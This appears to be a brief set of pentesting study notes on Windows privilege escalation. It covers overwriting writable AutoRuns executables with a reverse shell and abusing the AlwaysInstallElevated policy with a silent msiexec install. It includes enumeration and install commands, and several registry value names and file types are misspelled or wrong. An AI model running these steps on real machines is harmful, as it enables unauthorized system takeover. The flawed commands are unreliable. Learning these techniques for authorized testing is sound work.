Registry Exploits

AutoRuns

• Startup apps or "AutoRuns" are configures in the registry.

• If the autoruns executable is wriable and we have the privilege to restart the system, we can place the reverse shell and restart the system to get a shell

# Get a list of Autorun Programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check for each binary using accesshck
.\accesschk -quv "C:\Program Files\program.exe"

# overwrite with reverse shell and restart the service
SHELL!

AlwaysInstalledElevated

• MSI are installer files that are used to install application

• Runs with the permission of the user executing the file

• Windows allows for these installers to be run with elevated privileges.

• Two Registry requirements:

"AllwaysInstallElevated" should be 0x1 for
# Local Machine
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
# Current User
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

# Can be queried using reg command
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AllwaysInstalledElevated

# Gerenerate payload with msi format

# install with msiexec
msiexec /quiet /qn /i reverse.exe